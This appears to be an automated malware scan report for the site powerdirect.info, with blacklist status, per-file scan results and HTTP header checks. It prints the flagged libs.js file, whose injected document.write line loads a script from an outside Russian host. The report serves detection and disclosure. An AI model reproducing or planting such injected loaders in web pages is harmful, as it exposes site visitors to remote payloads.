Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=powerdirect.info
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://powerdirect.info/ | 200 OK Content-Length: 15224 Content-Type: text/html | clean |
http://powerdirect.info/engine/classes/js/jquery.js | 200 OK Content-Length: 93637 Content-Type: application/x-javascript | clean |
http://powerdirect.info/engine/classes/js/jqueryui.js | 200 OK Content-Length: 75927 Content-Type: application/x-javascript | clean |
http://powerdirect.info/engine/classes/js/dle_js.js | 200 OK Content-Length: 23054 Content-Type: application/x-javascript | clean |
http://powerdirect.info/templates/Default/js/libs.js | 200 OK Content-Length: 1602 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var logopened=false;
$(document).ready(function(){ $('#logbtn').click(function(){ if(logopened) { $('#logform').hide('fast'); $('#logbtn').removeClass('selected'); } else { $('#logform').show('fast'); $('#logbtn').addClass('selected'); } logopened=!logopened; return false; }); }).click(function( tabContainers.hide().filter(':first').show(); $('#news-arch .tabmenu a').click(function () { tabContainers.hide(); tabContainers.filter(this.hash).show(); $('#news-arch .tabmenu a').removeClass('selected'); $(this).addClass('selected'); return false; }).filter(':first').click(); }); document.write("<script type='text/javascript' src='http://iknopo.ru/iknopo_b.js'></script>") Antivirus reports:
| ||
http://res.restavrator.te.ua/zp/micr/micr.js | 200 OK Content-Length: 681 Content-Type: application/javascript | clean |
http://powerdirect.info/index.php?do=register | 200 OK Content-Length: 6929 Content-Type: text/html | clean |
http://powerdirect.info/index.php?do=lostpassword | 200 OK Content-Length: 8141 Content-Type: text/html | clean |
http://powerdirect.info/test404page.js | 404 Not Found Content-Length: 294 Content-Type: text/html | clean |
http://powerdirect.info/33818-minecraft-server-ic-bc-skachat.html | 200 OK Content-Length: 11151 Content-Type: text/html | clean |
http://powerdirect.info/engine/classes/js/bbcodes.js | 200 OK Content-Length: 9658 Content-Type: application/x-javascript | clean |
http://powerdirect.info/engine/classes/masha/ierange.js | 200 OK Content-Length: 16681 Content-Type: application/x-javascript | clean |
http://powerdirect.info/engine/classes/masha/masha.js | 200 OK Content-Length: 24766 Content-Type: application/x-javascript | clean |
http://powerdirect.info/6127-poigrat-v-onlajn-igru-majnkraft.html | 200 OK Content-Length: 11246 Content-Type: text/html | clean |
http://powerdirect.info/1038-skachat-server-minecraft-135.html | 200 OK Content-Length: 11618 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: powerdirect.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Sep 2014 10:04:26 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9ae86c2b0aecb42c267ec209555ea459; path=/; domain=.powerdirect.info; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
X-Powered-By: PHP/5.3.3-7+squeeze19
GET / HTTP/1.1
Host: powerdirect.info
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 22 Sep 2014 10:04:26 GMT
Pragma: no-cache
Server: nginx/0.7.67
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=9ae86c2b0aecb42c267ec209555ea459; path=/; domain=.powerdirect.info; HttpOnly
Set-Cookie: dle_user_id=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 22-Sep-2013 10:04:25 GMT; path=/; domain=.powerdirect.info; httponly
X-Powered-By: PHP/5.3.3-7+squeeze19
Second query (visit from search engine):
GET / HTTP/1.1
Host: powerdirect.info
Referer: http://www.google.com/search?q=powerdirect.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: powerdirect.info
Referer: http://www.google.com/search?q=powerdirect.info
Result:
The result is similar to the first query. There are no suspicious redirects found.